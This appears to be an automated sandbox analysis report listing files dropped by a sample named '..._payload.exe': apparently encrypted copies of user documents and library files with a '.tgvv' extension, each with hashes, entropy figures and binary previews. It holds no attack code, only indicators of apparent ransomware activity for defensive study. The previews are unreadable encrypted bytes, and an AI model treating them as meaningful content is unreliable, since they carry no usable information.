                                                                                                      Preview:%PDFT.*.*..KxU...}...=.....k.....H,.....cX]...&..J.....`X...z,....l0..M.....,o.|...\..=..W3..p&....L]....5...~.w...>u.M.....`.b.F..&F.t}.F......a.".E..[../.....k.x. ...IY.5....4c...X......t..A....y%.......V..O.v.r. &S.!./.6|.l...j.f..!.P.v.Y.t..cD..)..Q`[C..WOu.&.w.:@.c.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\Application Data\Adobe\Acrobat\DC\TMGrpPrm.sav.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):388
                                                                                                      Entropy (8bit):7.434071832157485
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:JMpyP3QwO21Yx5u9I0BSjX+hbXEinv6cii9a:yy/Qs1Yxk0jkEinv6bD
                                                                                                      MD5:50EBC06D88375553FA17AAAA2DEE8F07
                                                                                                      SHA1:4AC17CD4E4A671FB91BD4EC1F0759497BFA5D1B5
                                                                                                      SHA-256:3684ED434B0A18B12D92D04DE751BAE8EDCC013BEE784B8E6CBC4B7969C6C63E
                                                                                                      SHA-512:758B52E46AD88E8629EC403202116AE38C2E1F41B86531D2E178FC21EA2C502D5C3A70BE57CB45803C21F6AC7B68AA251AB3EBDBAE2D21FFCAA1493EF8EFC041
                                                                                                      Malicious:false
                                                                                                      Preview:%PDFTw...:Yk.F...G.]Xw.z.. ....:b....f..m.Q1y.y.x.A../.<.e...#..D..M.!.~..5u.?...-.!#.J.9.......t...UL.R3...j....`...C....[..s.n(Q.r.;.V.5..zS...(88.Sc..4B.....n...Q..(..`.I.l.D.|......%..b..19=L....x......A.....M.....7.3.'..)w.z$eW)..k.+.}........+'8.r..._........w.....0....y...s......6.P&.fhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\Application Data\Microsoft\UProof\CUSTOM.DIC.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):350
                                                                                                      Entropy (8bit):7.275454978959415
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:QI2rwg55pwDc0srVwTVoFwE10lknLOlwsdb8P2EaBq3SOXXvV9Wcii96Z:QqX6r0oKE10WLOSczuS8v6cii9a
                                                                                                      MD5:163FA870BC11EF87305B45D7985F3E93
                                                                                                      SHA1:8CCECE7C8278AD6C61A766FE2073F3591DE7FEED
                                                                                                      SHA-256:B940719917BF368A61FB2B88F0EF389BD4E30EDBB1C432135983050F68F7594D
                                                                                                      SHA-512:6C45277E551E6BA6F3757CB6C03AAAD71FD5D074D92A8C90D6FF62A6E8A523EA82903D4A2CA4AD0A1016EE92FD484DD05FCDD8D8C63F988C377885F78BA5EEBD
                                                                                                      Malicious:false
                                                                                                      Preview:..j.o.....9.....~.|.........~@.9Q..:z.z`o.Wma<it:..u/...U.p...<.{.qVj..u......7.p..P.......nU..s`..l..S..S.z &....p.. U..XYq...z..[.....&......6)....4.[.6.o(Vu.b..5.T..2)...g..>..r..C!T....n~.9nx{..y.Q....?.*.R...R@..N.).u~NMJ.._.a)....@. 2;.y..n.tK@...:..gu.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\CameraRoll.library-ms.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1352
                                                                                                      Entropy (8bit):7.841924922173719
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2xsl5vbsR+k5KV8+sy4tx0ymiehKH6FT1rPw5WfO5pOXEeTmdFxiWsy6th36r5vk:msl57xMJ7aFBDw5WDmdFxiWXWJ6twD
                                                                                                      MD5:D0D8DE27523AE2D3A4785E9EF19C39D2
                                                                                                      SHA1:5F5092965EDAA40824FAA3C45B9637416D20CC65
                                                                                                      SHA-256:9F745D0D4229C3E00655F1FCAD9396458B2FAC2681D38EEFDD0EACCEEEF70990
                                                                                                      SHA-512:9D66A42C52229B40B8758A7CB21E09C89311504B0103E26FD4850C3C593E851739BEE2F3CE7013CC32B712CEA604C93BC1D44920730813A2E4FC66890B424BA3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Yq.e....=....u.]xG7R",..+'..[...._..N..u.>n..#....R.l.!ol.v.)..-v...\....l...(...^>B...RX/.|.[_.)..moc`..E.~.y..Sc..%...20.........q..gA4#.?.m...\.x......;..A.5.I.g.~..c..j......T.....9......|]\...d;%XATKQr.\A0.K..MF@...{.:.Q.[*.+~M3./.oH.f.Y.i.S...b.xKH:,..{.1.Mu....D..w...Vw..0.#g..-8H....e.......db.|bePVx'..U...N.$.=..'. .......W.."h...4.Y.'i....m...($\.@|.H."%[bt..cT.}.".%.c.(...,.U.2~.j.@.+.......c..W.E.n...n^D....$.0.+.......#.cJ.s....0t.mA.BU.s8..?.o.U.?I@..#.Y}.+%."...7CE*O...4..'.h......g..p..2.;5...Z.......:...^VuE?~.$0.......^`.|N..9.|X.=.B?.uS....{ .C.1...d.e_K..`...t.>R^..J...&=...\'..R......~...7...Y..{..F..,..iY..'......^....".8.ss..../.O./.....D..-..3...Z{.T._q...}...^[...B...EZ...x..J.`1x....e..'..Z......>..k...Dl.........p....[.M.v./..K..a@Q...s..h./.....L..b...i.U...c...J"~.....T..\;j.~.v..)..<.R0....l.S:uVku..X:..r....H..L5....Q.....T.)......E..m.9..}JU.01%rR...h..N....R....p..q...>M./.k.........t

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Documents.library-ms.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2424
                                                                                                      Entropy (8bit):7.923538209970081
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:hd4kMyvIAbymT9WZb/QZFRzF02RfVCR4kB38J03fczWwG6MDRNKFwD:f4kMyvIAN6SF70WfwCk6JwfcKwG/Gm
                                                                                                      MD5:E4CF5317E68A0060E314C17800500561
                                                                                                      SHA1:B419CCEB2807014DB6106244C9D01FDCEE05AE22
                                                                                                      SHA-256:DA90C824DF01DE8CBD3E14CDAA370E00931388CA37A879131542F020374BF0F5
                                                                                                      SHA-512:90B79A2ADBC656F745E506C8EAD946BCAEEC2DB993EA1F7197D78828B68D666B2790B2FE741DC15637C1A7E8FFBB89E84242F0580819C5E7B3E64D17AECA7E6D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlz..Y..V{....I......V.x.'-w..g...-./+.:Yn..|.(....|"..........Z...37$K..L'.............~J......Q. .~.....#GW[......3g..e.m$...7.L...)....ih;$.h.S.....9.....,k+."[...|-nfS_..YnEsi.Lb....w0s`...*..Sh.^...6......e..C).T.h:..V..........2....]...`..1..!....SrB..~.E...j.X.t.i....mk2..+..........7Q..Q...>I.....M.".......V...YC..o..{..T..dw.mO.I.......m.f*...s.{....p6.E.i..58..Ht.....D...+.!....F.`...ex....I.....&..0..W..,...k_N}!(.)6W.]c.._QF1.._%%8!.!'....7#..F...^+.g."...#.{...*w.>.%.....e...Z.u0qW?...3..G.S.....l.(.p.M...g....@jO%......!....&.b........u..Q.b.T.9..ZD..08x..".q.....1..$.h.s...pc.}}.0."B..Q..l<...d.Vs....{...VS......wM.0.^........T*.........YM......Z...V.V....tG.~.>.[q.E...3.\......L.fa^..S0F.............+V...G5B..b..P.0.........U+.9Y...N.....%.N..v._O...'..g.z/.'.6./..t.M.p......8.".s.;.%mo...n|2..........o..+Y.t.....39i4e......*...y-......J..7@.3..\O&.n...........9F..fH.....(Wi1V.....O<..^.r&oi.q......a..>E.D.x.

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Music.library-ms.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2381
                                                                                                      Entropy (8bit):7.91044863240328
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:hW8bLDm0IlbQnpKb+k282KJfiuVzS2NGkq+U0dI+wUOVmaJFfHGSwD:s8bPm9l0e5F5/zrvdIR3tR6
                                                                                                      MD5:D59F9965C35F20D3E59AC22BA6A26DB2
                                                                                                      SHA1:085BB2CFFBFA363BBF7C83CFDF4666026E8FD9F9
                                                                                                      SHA-256:B691485982DA7D198D0797F056BF4F5BF2CB60BAE0C094ACF5DAC4557F1E84B4
                                                                                                      SHA-512:70B89233E0045E521E179151BC73A0AF8AAAE57DBEDF34B47D1FE13E402EA4EFDD08D03B07227F5E614562EA4C2055477B9179A184B9AA408D3C41ED6117CF0D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...i..|W..U."0$.URj.&.c.o#.I.....0....2Yv..3......!Q.*.p...B.5.`.R.C~..S......^.Z........6Re...r....a.N.....41.C&......Bz.Z.[|.T...........u..i&/.c......I......8..dh:N03...Q<-..d..t ~..d........7H.TeM1.&..Y...x8..%.......:..0...B.......1>..|d.........3......I3...a.H...2.e=.C..9...6).#..J...P%.l....%.[v.G.p.7/.Z...S._...?}...uRQ.3t...l.4...f..[!....<............t......Ex.c.f......`.Q.wS-K.d!...GEY...Y.eLD{...F....+z.+.w.HLf'.j..g...O...o_0...lcE.......Z..C......3zK.........6o..c%.#i..$...r=e..2.^.<o**.n`.l.h.?.UF_.O...}.O=.0...g..G...L~%......1....{v......1s*..aq...2.nF.qp.F....#m[..G....>.N.VYpn..../+zV.....U7.U.5k...{.P_..3g..TMr.?.$..Pb..mw8.w.b......].N..F).P.)X...0...i./z;....]..0..Lg..U.j...wS>z....0......_.V........|.u.`S.Py.4.....|..F......k..^..{eV.7#..9....c..#sIY...W.g.$Kt.:<.../.I,..C..7.B.Koy/.m....:.C-.*[6p..]..Yk.._.l...j..R.<..Op..F.{"Zx..x....R.ji..].&.......'.[.M.\...GGm`.@W.....=dS!..t".{P9.>..Z)#.R..b.[..K0....Gg.R<..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Pictures.library-ms.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2398
                                                                                                      Entropy (8bit):7.923246908293526
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:wN/oq/FfzMCs/NkELHgD3WWpGPEEeOgFIjDi20w9Iovxw3YBkil6nwD:whoASSKHG3WeGMEeFujDVyqjB1d
                                                                                                      MD5:B59CD1B17E54EDB01D26436A9947A5E7
                                                                                                      SHA1:011F3382A601C3E4C66FA40B7BFAF6A709587A28
                                                                                                      SHA-256:BAA69B30FC6A802CED696EB96390ED7AAEFE5372AA62B561F4A2ED83D075B064
                                                                                                      SHA-512:81F16FAAB496A3529CD0D522FA1C2B1A047687CDAE9110DC2A894FA4B46D3D0F57E317A665CCA902DA912F6EFDA648A9DBE2E2E259D109049068D63ED3FBF137
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlMl)A!.H.P..@.........I..4.....|.f^.-Y...o.fw.......:..~........mom4.H.I...H6..L...-..F..;E..w......hC l...S.9.?.1G-...".....b.'.K.m...g..N..Y.k=>v.$....7../x6Z.x,.UH.\...A.K.4..K.p-x...}......)5}j..3[5....#.@Q.1...=.#..."..JO\..NJwt..)lW.w2!k.{.#..!.j@....X.Z.l.......=.m.o*......j......X\..4.J....P.x..n@...2.I....$y..0....F .,h.....Y.U.J...&........~.hrqJg..._........Fs.#.z.....v....F.,."x....\..mW:K{..;Q.....}.Uq.lr$.P{X.)..2.....>oo.T...y......d..#..5..i1...$...$....*4Tk....W.#.W...H.#....5vk.`.x'>C4.c~^.L.G.|...1^8y.gY.Bc.`...|@:.d^8.3.../.9.um|.B.v..'..N.fv.&.I.........P{..nw3{..wo....r...[@......,.sL%.^..[hR......!...Tg....Z../.u&.y.(\.F^.....f.'6a..n..qy...c..O..d.. .%R...U......m..w.......{2.:..[.c.t.h...........:X...1..f..E.+_D......K..0.HG:.i.P..l.x.."..c...........0.&...YCv*......].....ONr>..BZ>;6..C..2..R.s.#..u:..9{.k%.l.x{./B.y..."vx....IpD...M!A8..?...bl..9.9.c..H..7.....d.!.9._.d5..f....L..T0....O......ah.g.|jF.

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\SavedPictures.library-ms.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1358
                                                                                                      Entropy (8bit):7.834177089632794
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Y0hcGE1yvov8Ns8oKqUQ4MpPNqXBrY3MfjekE1wdJ1hswXDwem1+JDu8W1gaftKc:nhcGE1mYxKqdUXBrKM7e/eJHswzwemkO
                                                                                                      MD5:B31189F2DC75C21AA9E01CE4D12CA949
                                                                                                      SHA1:C89A9D7B3552FBBBA29A29D2E282877060AC6420
                                                                                                      SHA-256:789E83F792466C576FC928B18CB8CF2424EE073E74218B04EE545CAAA1461386
                                                                                                      SHA-512:CB1E57A0A79C728D43048EB576A780EB3208D7F35DAA1FF74C1D49C919E3CED4693C11C9C30BA33EFBF3F0FCC303EC620352C6259EC2DB87E8EE2601181B0F4C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...z..s..r.<..E........vos..M.M..o'8[.JY....`...$.!7'H..Cb....c..A...K.y.&..{6.._.A..+..x...eC........,O3.X-..H"P4`..g...8*..btL...g.6..PRk.....s.U...JQ..).L...r.-.lT......H.....9.us..T...7...}.ee.~8BV.(m...K.....}...b..^#.Q.`..X(.q|...,Y..u.2.<.fT..Cw,...wh..7gQ%....s..M...{lY<w+..0.....^A.D...*....a.+...)..d..^..B...@.;y..._.SD..a....k~....v..~s;....eTf..6=.q..of.E/............aq.K..7.zy...=D?y.b....r.P...1..........l.-..7."....`x....<.F.,...[.C.=.A..[~.T!...xv.}...........7.Z...)H....skv.i...6....<d.......,..N..;u..ja........N.~.x.."Pv.,RJi.....I`.$.....:.)\nj...E.!vJ.c....V......D;.}.tA..E=.r.1...?.B......[....D.U.X<MoPY.3^.qX.l...7..v.4Xg...K......r0.*.Gy....>..q..!...(....@...446....4M.5.k...4V.N7...T..j).e..U.B6.7...Z.Ux....+.....1eT..9.7....`.......p.3w~...p0x..A[.;'?..YOi..]...,.Y...!...K.A...K.@&7.txr....%ZG...w..`AF5..Q@..1gYo.4.....}...2...]...J........8..o$-..D_.m......Mw..j...1.o...i.S;....H..'...Hw...:.Mh....W.....

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Libraries\Videos.library-ms.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2409
                                                                                                      Entropy (8bit):7.922814904802137
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:0wk3JBIpT61uUdZOajt67Y3JhK4RsNXH1hG2+2UaQitutBclfcqFjnwwJU5iGXwD:0wkgpTzqoajt67Y3MhumJuWJpU5tc
                                                                                                      MD5:4ACB8615F5EACEF0ABD6AA96AF0FC963
                                                                                                      SHA1:CE0BD0FE2280F5E394E81BDC5F7938FB416B352C
                                                                                                      SHA-256:966093375ABFBEC8CA88186714AC36002404E8BC9AE59AEFBF624B2BD8A31C6C
                                                                                                      SHA-512:934EC50350EF5E4FB9DC45C2512CF17C1E9D3CF12C63C7D54ECB795B94E8A47C65AD9A5410A518EC2BA0FE0E5CE0402C224BB263DCDB2ED51D213849C7971F52
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlCN.....hR..C...Ci..QR.>j/.....h.5...W])u....;.s...%./F.d...J...b.?)-p./v.*w.1.hU.S...gNf.#b.J............@.,......9Aa.]r..(p..........oi..M........fetW.8...e/.-Z.7~...bw.x...g. W...A._M...T...g...9...K.=....tX.....z.p.CZ.E.g....z..4.....w...Ay..J...z..7................6.<.o.'...c..lK..;yV..tola..4..B.E.....i`...._.".#.....,..Cq.$=...,1.}XI.f}.v.."..9....>m4<[.....).U.....[4..p[..$B=:Tt...j...q...D.....C].8.5..,....4..q........%e........7.j.+]..K1.z..S2 .....u&Y..)c....=..*v...Z...t...v'C.T."(:.T.s.W......$;Q.~...Vr.(N7...:...E..@.x.~.x..4......#... .J...|..zE..a...R..+.e.9.%D.....9...9.=..o.E..$$...:i`.... ..6......".0...2...J.y..N..P.......`.H..t..gh_Em.W.nU..lyFW.p.(..........%..(H..[t.......!..W...C.N.".._.j.....}R.D-}2X.^..... /b.#...6 K.Hl.\..H.8U8..@.z..X..6.......E. :...n..\]x.FC...Mn.m+.}.O...U-s..c........?CG_.......k......d.&.(%+.o...+'.....~VI..J.........d.L..!S......F...$6...E...c_?e......qAqb.#.sp......t!#...@?H/

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\AIXACVYBSB.docx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.834266106667347
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:h8ySPwahdBuoRzcXLdSVJlMyi4fu5Zu+4bTviXQq/TgM4OeyQXvM5xupYog9eA2s:e/PJpbxtGt4Pw9sbOe9XvKGGwFwD
                                                                                                      MD5:1E91DB611E24ADEC87094BB1E7CED9C0
                                                                                                      SHA1:5CAB76FA6E2B1C85E7EEF5D126AC187F2CCF7178
                                                                                                      SHA-256:C8441A416BE813EDF4441B4B49CB0C9A787AE34B0C306C682A490FF63E8B0DFF
                                                                                                      SHA-512:E0D62540D2B51F3D89EBC18DC280CCD5F98853183EF6DEA025E185A86C51BA4EFF99A5DAB555E59C2FCF17214778C749F5923F1D012ECE441016BA27C57E436F
                                                                                                      Malicious:false
                                                                                                      Preview:AIXAC..Y7...Z....\.B..+...U..xQ.ym...........2.geh..LEC.@j.J].....g6.y...+.....K|z.xaW..yF.!>@.|.g..."Dx.iJ>k.$.P.;1).-./.._(uS'.....+....g..A.....3[s\.`(u.<`-...Hk...=6.D.i..J.B.^....o.hLO..../Q...<!..:.d.[..U..D...E...xF?l..UTk......*...tu(.0.?..r~...mU(.[..ul..P.;i....:_/=...d......i..).5...............z..".......[..OG.|...lP.Dm.nU.."yF..]T..Q).Aj.W.-..3..n..+.3..|7..V..H.".S0......z...?.....1....1...C2T..R!.F.9e..r....*.-w.d.e.v..D.....~..~.U&*.h$H.X..)...]W,....r..v.....;..Z.v.....)...u..}L.j.?.....G..M..J}..C.......#1RK,g..R.....g.......|W...EMy.2.n..:.'.d..fl+E;..N.5,...mY...F...r%.:3.A.DBk.[....#.Z[+....Q..WV.....7.....o.8c............h+.@.M..,.b{'.fgBT.`/....MVP..].l.`.-.j..,....Y.)+.9t..A...k..'80.A.A...P8..b.I...C..u/l...jT.G>.m...^....-....[..,.{#9.E....t#9q.0.tX.N.N....;.....`].."..zE82..H.>-.fl...9..naP..e.,..%..TD.y[.Au.g..W.G....M..W.U.<S.R.Yv......x.V]cJ...VC2K..a.....6'./.ie....Km.....)O.3"/.E}.........M.4.%.......^.r..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\AIXACVYBSB.xlsx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.857411951729365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:I6CE0rHK1JVG6oshFbpDxzvoob4gb8r81gD1AITRX7/CsRRuv6bD:IZE0rqk63Bxzygb8r81gFRX7J0wD
                                                                                                      MD5:9D94F0BEC9D69B72485CD4C1AF117FCA
                                                                                                      SHA1:2D2A7DCAC257A0344F4E7C230732080171966647
                                                                                                      SHA-256:A03495F4201F05B13AE5879906B10001E099EE1D478D0DCFD36DE29B28D212CF
                                                                                                      SHA-512:5E7A5C464190D1A46B8B85B547F11F1DD60389CC54B576DD7701922B54EF61701C4B3F05B525BB720662A315668B7944E7B8AF836458B7345288299D8FA52474
                                                                                                      Malicious:false
                                                                                                      Preview:AIXAC~......$.l.>@....RZ=jh.s.Bf=B........)..2..&..8......A....6....f...RL.tJp..1Q?.K.a...b..K. .&.....7iH..el.%.f....1!.O.........<.@$...f.......}.....O..8.e.$..........T.<"83..On1.q.*.-..1.!._...+..|}v.%9t.-z.....UX\..A.3.b...1<uz....w|R......gfcr...i.......Vzh.........YR...s...+.o.)W.p.H.........J.(/..q.j.J=..y.i.kyI....(....=....P .|.).@r...E.\=......l..+......I^H+G.'uhk.~...4..`_.K........F...^a.F..q....GX..V.u.~.f.......68mtL=/..J......U ....!M.=.X.\....=U:xi...~.t.fi......M...C.[.5n'......*o...oN....y.u8~>.tu*...s...i.U.....u..-..?.X_.j~...r0.....;g....F..bH.q...->.@...\.N.$B.gg.@..m..<.C7Q..8,.R.X.r..\.on+...n}..9.W...u|J.....S.3..J..}...h.8U..|-zk^....'=.e.....9...;...D...;..@..}.G.G....E..Nx..[...P....Ih..,..*..?I;...?G.N.`..~.Y..0...!Z...;.h....5.....}.}.w..X.P.......th.@.. )..4..A5mD.......N.-..)..k\.9.v..]...b.?R.iGV.....NR....G.&....{.%("..R..d....v...w..uQ.7)NK&;...@z.:.....%=...z.........xJ.J.o"....=.vi[.E.C}.......

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\BWDRWEEARI.pdf.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.8621865706180385
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:9EXJue/y1/5KPMdYgQh4r0EjfiyAWf3eNz0g1CDJceYamuXRu8aZYvYLNS10Sjqs:9E5Ny1Ukqdhy0EbXAWmUDpGUvYRSqwD
                                                                                                      MD5:2A62B31FEE3AE4CFFF5517B81E1B8BA0
                                                                                                      SHA1:25E30C0D25AD8B1A64BFCCD3A3FAE85BBF23495E
                                                                                                      SHA-256:D047475DCA450BE6CBD2677D02AA1F7FD8E3771354DC4ADC719CD6A9D829C91C
                                                                                                      SHA-512:81C11CE331714083501E020503032286BD9B4AA8F87D8778DC0D2422393B51208B1D71419C71EDDACBFA24BD9815607B13F3075944CD5AA1AB35708725B85CF6
                                                                                                      Malicious:false
                                                                                                      Preview:BWDRWA.c...>.#..U....A@p.d.^t.e....L.f1.Y...-u.*.....D..T.k.."...v.rT.I...8..-.s....h.......v.I... ...[.'d.l..Kp5+=..........M.v.N.xo.Wc./.''F.jN..c.....<.i.?o....C...j.....X."-V.".^..P.%..... .Z.,I..T.n.;...#O<..G.....d.y.A. G.}...|......K..f....r........y.6VH...ev..y....X..d...]..v.....Q.Q."...n..E}....C..#......0..H.......9...{.!4...........C.".<?I.[....i.'O`.....f\.2<...m..._..k.....i.~I.{...5...q..a'.M*n..."5....0ly_......Z.x0e.n..B.F.......+.AzZ.H..5tud}.....l...>..pY.i..;yg6./...b[.@.....>]f.!.b.T....^....Q.aLHJ..b(n.....?\. ..I..W..H.!.).K.......ow-*.|....B..1#.}..8.2.+...'b..8!jL...L.u..'..2..{... M......]..o..0.z...IIF+..*.V..2.x.M..c...........P..Kf..g(...$R..Z.2J.c.Zp..l.H...2...Q.TW.N.7G.....[}........oz...W.?*.Y....ca..>.+.^&....a...ML........_.....Z.tf.*........_^.WK....1=.h.7r.......U.,....v'.E.rfG....J..U...........j....[....+..F.....g.F..bK.>.6l{.x....iJ..p.m[l5..:...).k.^.......5..!.UQ...C.&*.+.l.h.%.o'=*y..ts.<=...x...

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\DTBZGIOOSO.docx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.831523968480816
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+F4s5Cm/g/yjNT8WLlXRueRvU82uDP+ha3+beVSPncpnrWMIah6TnB/8QIrzv6bD:e9CmY/lWNc3uDP8aObknrWz8wD
                                                                                                      MD5:BF4DC4AE25440E62A05E4A31B89F1CF0
                                                                                                      SHA1:2F2B0E589348043427C77028BB0D471A6A56BE5A
                                                                                                      SHA-256:02743449FD889D91FAC23C6A8AF0C4C792CB05ABA309E82D59D6197DB02D6280
                                                                                                      SHA-512:A0C2418CE1DB67D0378381989372A71314F1F9FCDC4CB0867F98B604FBAF2008107D35C74D915477DC7A69E301B7002976961443ED8E7D8A8F0EADA8982FCD64
                                                                                                      Malicious:false
                                                                                                      Preview:DTBZG....B..."..I/X......*a.y.=. ...b...Y...ye.].......M9.|Y1ZjQ..C.Ka?.....D.....Q...I.O<X|.`.?...........Z.._.rT..-.M.s.V....F{|.>.......>.I.2...........)Y..P...0m.>#........,.G.(..]d.u..Ba5w..uO.S.....6.qK9.gF.!dg....w.3?../!.<B...s...}..u....[Q...0x.e...'..(...OO....#...).'...!fKE..'P3..'B\~."..x..=.i...AX.....n.K.M^R.1..TQ%,.Vp.".T../p. .KH..3..]....G.......HY..Q...y...s[.7.......)..=..D...."e..-..$E.D...{D..&[.n]0..c..)2.K....k..... .o..!?...(...8..p.G..y...-.CO.(......\.?..U.hbJ.............-S5..L*t......&......T..9{.5.\.0.8..i...uE..LG..].H.?O4.<.Q..V..K........MA..G.."..[.....'r.....8.1..C.M......7!.0@..M..C..(.u....V.~.`.....p........*...)..9U.[....Vm.._....p<..x[...M..S...At.C...|...(.e[..u....|.....c...5...J.A.iK/..r.. .........y..A.U.....s......Ym......3.....G...I~.p.>6...v^j.[$.< ..|..`..x5.0.g""R.l%w7..t.U....;.....t..!d.M....Y....../y3?..>.f?giGK...........,<.vE.|.]....W.1$...X.g......._\.... ....C.9P.....?.W...m....

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\DTBZGIOOSO.pdf.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.854271818693247
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bm46t0SdVSIA+EPbNUgPbDPwK7q94TuINKc7XaxFbiYOyVmgHCMzwaiLv6bD:2t0S37A/PdbZg34bX8/5VHCMzwamwD
                                                                                                      MD5:E797D3506A6DA41C9D4FBE4440F65997
                                                                                                      SHA1:572BEA225CE488784A547C683335B2AE1F450978
                                                                                                      SHA-256:70449ECBB58034D8B7EF4D639AA53A360D3465172EA0A40F9938D034CEC6BB0C
                                                                                                      SHA-512:B882999102D5E81B7E2E32B47CC8154D6E5D5F4FE93EA55C86D33A8E816EBE1E72AA266885CBAFA5B3F9BE1ADD4B090E4C88D0A5BFC2448BB70AEA6616C2A303
                                                                                                      Malicious:false
